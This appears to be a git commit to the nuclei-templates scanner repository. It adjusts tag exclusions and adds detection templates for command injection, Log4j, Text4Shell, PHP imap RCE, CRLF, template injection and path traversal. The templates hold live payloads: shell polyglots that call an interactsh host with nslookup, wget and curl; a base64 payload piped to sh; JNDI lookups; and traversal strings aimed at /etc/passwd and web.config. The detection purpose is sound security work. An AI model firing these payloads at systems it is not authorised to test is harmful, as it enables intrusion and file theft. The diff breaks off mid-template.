Added fuzzing templates
parent
4aef6c0933
commit
fc79bf96b7
|
@ -2,7 +2,7 @@
|
||||||
# ====================================
|
# ====================================
|
||||||
#
|
#
|
||||||
# This is default list of tags and files to excluded from default nuclei scan.
|
# This is default list of tags and files to excluded from default nuclei scan.
|
||||||
# More details - https://nuclei.projectdiscovery.io/nuclei/get-started/#template-exclusion
|
# More details - https://docs.projectdiscovery.io/tools/nuclei/running#template-exclusion
|
||||||
#
|
#
|
||||||
# ============ DO NOT EDIT ============
|
# ============ DO NOT EDIT ============
|
||||||
# Automatically updated by nuclei on execution from nuclei-templates
|
# Automatically updated by nuclei on execution from nuclei-templates
|
||||||
|
@ -13,10 +13,8 @@
|
||||||
# unless asked for by the user.
|
# unless asked for by the user.
|
||||||
|
|
||||||
tags:
|
tags:
|
||||||
- "fuzz"
|
|
||||||
- "dos"
|
- "dos"
|
||||||
- "local"
|
- "local"
|
||||||
- "brute-force"
|
|
||||||
- "bruteforce"
|
- "bruteforce"
|
||||||
- "phishing"
|
- "phishing"
|
||||||
|
|
||||||
|
|
|
@ -20,7 +20,7 @@ type:
|
||||||
exclude-tags:
|
exclude-tags:
|
||||||
- tech
|
- tech
|
||||||
- dos
|
- dos
|
||||||
- brute-force
|
- bruteforce
|
||||||
- creds-stuffing
|
- creds-stuffing
|
||||||
- token-spray
|
- token-spray
|
||||||
- osint
|
- osint
|
|
@ -15,5 +15,5 @@ type:
|
||||||
|
|
||||||
exclude-tags:
|
exclude-tags:
|
||||||
- dos
|
- dos
|
||||||
- brute-force
|
- bruteforce
|
||||||
- osint
|
- osint
|
|
@ -20,7 +20,7 @@ type:
|
||||||
exclude-tags:
|
exclude-tags:
|
||||||
- tech
|
- tech
|
||||||
- dos
|
- dos
|
||||||
- brute-force
|
- bruteforce
|
||||||
- creds-stuffing
|
- creds-stuffing
|
||||||
- token-spray
|
- token-spray
|
||||||
- osint
|
- osint
|
||||||
|
|
|
@ -9,7 +9,7 @@ info:
|
||||||
- https://portswigger.net/web-security/web-cache-poisoning
|
- https://portswigger.net/web-security/web-cache-poisoning
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 5834
|
max-request: 5834
|
||||||
tags: fuzzing,bruteforce,cache
|
tags: bruteforce,cache
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
|
@ -11,7 +11,7 @@ info:
|
||||||
cwe-id: CWE-77
|
cwe-id: CWE-77
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 7650
|
max-request: 7650
|
||||||
tags: fuzzing,bruteforce,rce
|
tags: bruteforce,rce
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
|
@ -11,7 +11,7 @@ info:
|
||||||
cwe-id: CWE-200
|
cwe-id: CWE-200
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 22
|
max-request: 22
|
||||||
tags: fuzzing,linux,lfi,bruteforce
|
tags: linux,lfi,bruteforce
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
|
@ -6,7 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 639
|
max-request: 639
|
||||||
tags: fuzzing,bruteforce,prestashop
|
tags: bruteforce,prestashop
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
|
@ -20,8 +20,6 @@ http:
|
||||||
payloads:
|
payloads:
|
||||||
path: helpers/wordlists/prestashop-modules.txt
|
path: helpers/wordlists/prestashop-modules.txt
|
||||||
|
|
||||||
threads: 50
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
|
@ -8,7 +8,7 @@ info:
|
||||||
- https://github.com/dievus/geeMailUserFinder
|
- https://github.com/dievus/geeMailUserFinder
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
max-request: 1
|
||||||
tags: bruteforce,gmail
|
tags: gmail
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -11,7 +11,7 @@ info:
|
||||||
cwe-id: CWE-200
|
cwe-id: CWE-200
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 58
|
max-request: 58
|
||||||
tags: fuzzing,waf,tech,bruteforce
|
tags: waf,bruteforce
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
|
@ -56,6 +56,7 @@ http:
|
||||||
- SELECT * FROM information_schema.tables
|
- SELECT * FROM information_schema.tables
|
||||||
- SELECT user FROM information_schema.tables AND user = \'test user\';
|
- SELECT user FROM information_schema.tables AND user = \'test user\';
|
||||||
- UNION SELECT * FROM users WHERE user = \'admin\';
|
- UNION SELECT * FROM users WHERE user = \'admin\';
|
||||||
|
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
|
@ -6,7 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 100563
|
max-request: 100563
|
||||||
tags: fuzzing,bruteforce,wordpress
|
tags: bruteforce,wordpress
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
|
@ -14,7 +14,6 @@ http:
|
||||||
GET /wp-content/plugins/{{pluginSlug}}/readme.txt HTTP/1.1
|
GET /wp-content/plugins/{{pluginSlug}}/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
threads: 50
|
|
||||||
payloads:
|
payloads:
|
||||||
pluginSlug: helpers/wordlists/wordpress-plugins.txt
|
pluginSlug: helpers/wordlists/wordpress-plugins.txt
|
||||||
|
|
|
@ -6,7 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 24434
|
max-request: 24434
|
||||||
tags: bruteforce,wordpress,wp
|
tags: bruteforce,wordpress
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
|
@ -16,7 +16,6 @@ http:
|
||||||
|
|
||||||
payloads:
|
payloads:
|
||||||
themeSlug: helpers/wordlists/wordpress-themes.txt
|
themeSlug: helpers/wordlists/wordpress-themes.txt
|
||||||
threads: 50
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
|
@ -27,10 +27,10 @@ http:
|
||||||
|
|
||||||
log={{users}}&pwd={{passwords}}
|
log={{users}}&pwd={{passwords}}
|
||||||
|
|
||||||
|
attack: clusterbomb
|
||||||
payloads:
|
payloads:
|
||||||
users: helpers/wordlists/wp-users.txt
|
users: helpers/wordlists/wp-users.txt
|
||||||
passwords: helpers/wordlists/wp-passwords.txt
|
passwords: helpers/wordlists/wp-passwords.txt
|
||||||
attack: clusterbomb
|
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
|
@ -7,7 +7,7 @@ info:
|
||||||
description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header.
|
description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header.
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 3
|
max-request: 3
|
||||||
tags: fuzzing,bruteforce
|
tags: bruteforce
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
|
@ -0,0 +1,46 @@
|
||||||
|
id: cmdi-blind-oast-polyglot
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Blind OS Command Injection
|
||||||
|
author: pdteam,geeknik
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
Potential blind OS command injection vulnerabilities, where the application constructs OS commands using unsanitized user input.
|
||||||
|
Successful exploitation could lead to arbitrary command execution on the system.
|
||||||
|
reference:
|
||||||
|
- https://portswigger.net/research/hunting-asynchronous-vulnerabilities
|
||||||
|
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command%20Injection/README.md
|
||||||
|
tags: cmdi,oast,dast,blind,polyglot,fuzz
|
||||||
|
|
||||||
|
variables:
|
||||||
|
marker: "{{interactsh-url}}"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
interaction:
|
||||||
|
- "&nslookup {{marker}}&'\\\"`0&nslookup {{marker}}&`'"
|
||||||
|
- "1;nslookup${IFS}{{marker}};#${IFS}';nslookup${IFS}{{marker}};#${IFS}\";nslookup${IFS}{{marker}};#${IFS}"
|
||||||
|
- "/*$(nslookup {{marker}})`nslookup {{marker}}``*/-nslookup({{marker}})-'/*$(nslookup {{marker}})`nslookup {{marker}}` #*/-nslookup({{marker}})||'\"||nslookup({{marker}})||\"/*`*/"
|
||||||
|
- "$(ping -c 1 {{marker}} | nslookup {{marker}} ; wget {{marker}} -O /dev/null)"
|
||||||
|
|
||||||
|
fuzzing:
|
||||||
|
- part: query
|
||||||
|
type: postfix
|
||||||
|
fuzz:
|
||||||
|
- "{{interaction}}"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol
|
||||||
|
words:
|
||||||
|
- "dns"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol
|
||||||
|
words:
|
||||||
|
- "http"
|
|
@ -0,0 +1,41 @@
|
||||||
|
id: CVE-2018-19518
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: PHP imap - Remote Command Execution
|
||||||
|
author: princechaddha
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a "-oProxyCommand" argument.
|
||||||
|
reference:
|
||||||
|
- https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-19518
|
||||||
|
- https://www.openwall.com/lists/oss-security/2018/11/22/3
|
||||||
|
- https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 7.5
|
||||||
|
cve-id: CVE-2018-19518
|
||||||
|
cwe-id: CWE-88
|
||||||
|
metadata:
|
||||||
|
confidence: tenative
|
||||||
|
tags: imap,dast,vulhub,cve,cve2018,rce,oast,php,fuzz
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
php-imap:
|
||||||
|
- "x -oProxyCommand=echo {{base64(url_encode('nslookup {{interactsh-url}}'))}}|base64 -d|sh}"
|
||||||
|
|
||||||
|
fuzzing:
|
||||||
|
- part: query
|
||||||
|
fuzz:
|
||||||
|
- "{{php-imap}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the DNS Interaction
|
||||||
|
words:
|
||||||
|
- "dns"
|
|
@ -0,0 +1,60 @@
|
||||||
|
id: CVE-2021-45046
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Apache Log4j2 - Remote Code Injection
|
||||||
|
author: princechaddha
|
||||||
|
severity: critical
|
||||||
|
description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.
|
||||||
|
reference:
|
||||||
|
- https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/
|
||||||
|
- https://twitter.com/marcioalm/status/1471740771581652995
|
||||||
|
- https://logging.apache.org/log4j/2.x/
|
||||||
|
- http://www.openwall.com/lists/oss-security/2021/12/14/4
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||||
|
cvss-score: 9
|
||||||
|
cve-id: CVE-2021-45046
|
||||||
|
cwe-id: CWE-502
|
||||||
|
metadata:
|
||||||
|
confidence: tenative
|
||||||
|
tags: cve,cve2021,rce,oast,log4j,injection,dast,fuzz
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
log4j:
|
||||||
|
- "${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}}"
|
||||||
|
|
||||||
|
fuzzing:
|
||||||
|
- part: query
|
||||||
|
fuzz:
|
||||||
|
- "{{log4j}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the DNS Interaction
|
||||||
|
words:
|
||||||
|
- "dns"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
regex:
|
||||||
|
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
|
@ -0,0 +1,65 @@
|
||||||
|
id: CVE-2022-42889
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Text4Shell - Remote Code Execution
|
||||||
|
author: mordavid,princechaddha
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.
|
||||||
|
reference:
|
||||||
|
- https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om
|
||||||
|
- http://www.openwall.com/lists/oss-security/2022/10/13/4
|
||||||
|
- http://www.openwall.com/lists/oss-security/2022/10/18/1
|
||||||
|
- https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/
|
||||||
|
- https://github.com/silentsignal/burp-text4shell
|
||||||
|
remediation: Upgrade to Apache Commons Text component between 1.5.0 to 1.10.0.
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-42889
|
||||||
|
cwe-id: CWE-94
|
||||||
|
metadata:
|
||||||
|
confidence: tenative
|
||||||
|
tags: cve,cve2022,rce,oast,text4shell,dast,fuzz
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
text4shell:
|
||||||
|
- "${url:UTF-8:https://{{Hostname}}.q.{{interactsh-url}}}"
|
||||||
|
|
||||||
|
fuzzing:
|
||||||
|
- part: query
|
||||||
|
fuzz:
|
||||||
|
- "{{text4shell}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the DNS Interaction
|
||||||
|
words:
|
||||||
|
- "dns"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
regex:
|
||||||
|
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
kval:
|
||||||
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 1
|
||||||
|
regex:
|
|
@ -0,0 +1,36 @@
|
||||||
|
id: cmdi-ruby-open-rce
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Ruby Kernel#open/URI.open RCE
|
||||||
|
author: pdteam
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open(“| ls”)). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open.
|
||||||
|
reference:
|
||||||
|
- https://bishopfox.com/blog/ruby-vulnerabilities-exploits
|
||||||
|
- https://codeql.github.com/codeql-query-help/ruby/rb-kernel-open/
|
||||||
|
tags: cmdi,oast,dast,blind,ruby,rce,fuzz
|
||||||
|
|
||||||
|
variables:
|
||||||
|
marker: "{{interactsh-url}}"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
payloads:
|
||||||
|
interaction:
|
||||||
|
- "|nslookup {{marker}}|curl {{marker}}"
|
||||||
|
|
||||||
|
fuzzing:
|
||||||
|
- part: query
|
||||||
|
fuzz:
|
||||||
|
- "{{interaction}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol
|
||||||
|
words:
|
||||||
|
- "dns"
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: cookie-injection
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Parameter based cookie injection
|
||||||
|
author: pdteam
|
||||||
|
severity: info
|
||||||
|
reference:
|
||||||
|
- https://www.invicti.com/blog/web-security/understanding-cookie-poisoning-attacks/
|
||||||
|
- https://docs.imperva.com/bundle/on-premises-knowledgebase-reference-guide/page/cookie_injection.htm
|
||||||
|
tags: reflected,dast,cookie,injection,fuzz
|
||||||
|
|
||||||
|
variables:
|
||||||
|
first: "cookie_injection"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
reflection:
|
||||||
|
- "{{first}}"
|
||||||
|
|
||||||
|
fuzzing:
|
||||||
|
- part: query
|
||||||
|
type: postfix
|
||||||
|
fuzz:
|
||||||
|
- "{{reflection}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: header
|
||||||
|
regex:
|
||||||
|
- '(?m)(?i)(^set-cookie.*cookie_injection.*)'
|
|
@ -0,0 +1,69 @@
|
||||||
|
id: crlf-injection
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: CRLF Injection
|
||||||
|
author: pdteam
|
||||||
|
severity: low
|
||||||
|
tags: crlf,dast,fuzz
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
escape:
|
||||||
|
- "%00"
|
||||||
|
- "%0a"
|
||||||
|
- "%0a%20"
|
||||||
|
- "%0d"
|
||||||
|
- "%0d%09"
|
||||||
|
- "%0d%0a"
|
||||||
|
- "%0d%0a%09"
|
||||||
|
- "%0d%0a%20"
|
||||||
|
- "%0d%20"
|
||||||
|
- "%20"
|
||||||
|
- "%20%0a"
|
||||||
|
- "%20%0d"
|
||||||
|
- "%20%0d%0a"
|
||||||
|
- "%23%0a"
|
||||||
|
- "%23%0a%20"
|
||||||
|
- "%23%0d"
|
||||||
|
- "%23%0d%0a"
|
||||||
|
- "%23%oa"
|
||||||
|
- "%25%30"
|
||||||
|
- "%25%30%61"
|
||||||
|
- "%2e%2e%2f%0d%0a"
|
||||||
|
- "%2f%2e%2e%0d%0a"
|
||||||
|
- "%2f..%0d%0a"
|
||||||
|
- "%3f"
|
||||||
|
- "%3f%0a"
|
||||||
|
- "%3f%0d"
|
||||||
|
- "%3f%0d%0a"
|
||||||
|
- "%e5%98%8a%e5%98%8d"
|
||||||
|
- "%e5%98%8a%e5%98%8d%0a"
|
||||||
|
- "%e5%98%8a%e5%98%8d%0d"
|
||||||
|
- "%e5%98%8a%e5%98%8d%0d%0a"
|
||||||
|
- "%e5%98%8a%e5%98%8d%e5%98%8a%e5%98%8d"
|
||||||
|
- "%u0000"
|
||||||
|
- "%u000a"
|
||||||
|
- "%u000d"
|
||||||
|
- "\r"
|
||||||
|
- "\r%20"
|
||||||
|
- "\r\n"
|
||||||
|
- "\r\n%20"
|
||||||
|
- "\r\n\t"
|
||||||
|
- "\r\t"
|
||||||
|
|
||||||
|
fuzzing:
|
||||||
|
- part: query
|
||||||
|
type: postfix
|
||||||
|
fuzz:
|
||||||
|
- "{{escape}}Set-Cookie:crlfinjection=crlfinjection"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: header
|
||||||
|
regex:
|
||||||
|
- '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
|
|
@ -0,0 +1,39 @@
|
||||||
|
id: angular-client-side-template-injection
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Angular Client-side-template-injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: high
|
||||||
|
reference:
|
||||||
|
- https://www.acunetix.com/vulnerabilities/web/angularjs-client-side-template-injection/
|
||||||
|
- https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs
|
||||||
|
tags: angular,csti,dast,fuzz
|
||||||
|
|
||||||
|
variables:
|
||||||
|
first: "{{rand_int(1000, 9999)}}"
|
||||||
|
second: "{{rand_int(1000, 9999)}}"
|
||||||
|
result: "{{to_number(first)*to_number(second)}}"
|
||||||
|
|
||||||
|
headless:
|
||||||
|
- steps:
|
||||||
|
- action: navigate
|
||||||
|
args:
|
||||||
|
url: "{{BaseURL}}"
|
||||||
|
- action: waitload
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
payload:
|
||||||
|
- '{{concat("{{", "{{first}}*{{second}}", "}}")}}'
|
||||||
|
|
||||||
|
fuzzing:
|
||||||
|
- part: query
|
||||||
|
type: postfix
|
||||||
|
mode: single
|
||||||
|
fuzz:
|
||||||
|
- "{{payload}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "{{result}}"
|
|
@ -0,0 +1,118 @@
|
||||||
|
id: lfi-keyed
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Key LFI Detection
|
||||||
|
author: pwnhxl
|
||||||
|
severity: unknown
|
||||||
|
reference:
|
||||||
|
- https://owasp.org/www-community/attacks/Unicode_Encoding
|
||||||
|
tags: dast,pathtraversal,lfi,fuzz
|
||||||
|
|
||||||
|
variables:
|
||||||
|
fuzz: "../../../../../../../../../../../../../../../"
|
||||||
|
fuzz_urlx2_encode: "%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f"
|
||||||
|
fuzz_hex_unicode: "%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f"
|
||||||
|
fuzz_utf8_unicode: "%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF"
|
||||||
|
fuzz_utf8_unicode_x: "%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF"
|
||||||
|
fuzz_bypass_replace: ".../.../.../.../.../.../.../.../.../.../.../.../.../.../.../"
|
||||||
|
fuzz_bypass_replace_windows: '..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\'
|
||||||
|
fuzz_bypass_waf_regx: "./.././.././.././.././.././.././.././.././.././.././.././.././.././.././../"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
pathtraversal:
|
||||||
|
- '{{fuzz}}etc/passwd'
|
||||||
|
- '{{fuzz}}windows/win.ini'
|
||||||
|
- '/etc/passwd%00.jpg'
|
||||||
|
- 'c:/windows/win.ini%00.jpg'
|
||||||
|
- '{{fuzz}}etc/passwd%00.jpg'
|
||||||
|
- '{{fuzz}}windows/win.ini%00.jpg'
|
||||||
|
- '{{fuzz_urlx2_encode}}etc%252fpasswd'
|
||||||
|
- '{{fuzz_urlx2_encode}}windows%252fwin.ini'
|
||||||
|
- '{{fuzz_hex_unicode}}etc%u002fpasswd'
|
||||||
|
- '{{fuzz_hex_unicode}}windows%u002fwin.ini'
|
||||||
|
- '{{fuzz_utf8_unicode}}etc%C0%AFpasswd'
|
||||||
|
- '{{fuzz_utf8_unicode}}windows%C0%AFwin.ini'
|
||||||
|
- '{{fuzz_utf8_unicode_x}}etc%C0AFpasswd'
|
||||||
|
- '{{fuzz_utf8_unicode_x}}windows%C0AFwin.ini'
|
||||||
|
- '{{fuzz_bypass_replace}}etc/passwd'
|
||||||
|
- '{{fuzz_bypass_replace}}windows/win.ini'
|
||||||
|
- '{{fuzz_bypass_replace_windows}}windows\win.ini'
|
||||||
|
- '{{fuzz_bypass_waf_regx}}etc/passwd'
|
||||||
|
- '{{fuzz_bypass_waf_regx}}windows/win.ini'
|
||||||
|
- './web.config'
|
||||||
|
- '../web.config'
|
||||||
|
- '../../web.config'
|
||||||
|
- './WEB-INF/web.xml'
|
||||||
|
- '../WEB-INF/web.xml'
|
||||||
|
- '../../WEB-INF/web.xml'
|
||||||
|
|
||||||
|
fuzzing:
|
||||||
|
- part: query
|
||||||
|
mode: single
|
||||||
|
keys:
|
||||||
|
- cat
|
||||||
|
- dir
|
||||||
|
- action
|
||||||
|
- board
|
||||||
|
- date
|
||||||
|
- detail
|
||||||
|
- file
|
||||||
|
- download
|
||||||
|
- path
|
||||||
|
- folder
|
||||||
|
- prefix
|
||||||
|
- include
|
||||||
|
- page
|
||||||
|
- inc
|
||||||
|
- locate
|
||||||
|
- show
|
||||||
|
- doc
|
||||||
|
- site
|
||||||
|
- type
|
||||||
|
- view
|
||||||
|
- content
|
||||||
|
- document
|
||||||
|
- layout
|
||||||
|
- mod
|
||||||
|
- conf
|
||||||
|
- url
|
||||||
|
- img
|
||||||
|
- image
|
||||||
|
- images
|
||||||
|
fuzz:
|
||||||
|
- "{{pathtraversal}}"
|
||||||
|
|
||||||
|
- part: query
|
||||||
|
mode: single
|
||||||
|
values:
|
||||||
|
- "^(./|../|/)|(.html|.htm|.xml|.conf|.cfg|.log|.txt|.pdf|.doc|.docx|.xls|.csv|.png|.jpg|.gif)$"
|
||||||
|
fuzz:
|
||||||
|
- "{{pathtraversal}}"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: or
|
||||||
|
matchers:
|
||||||
|
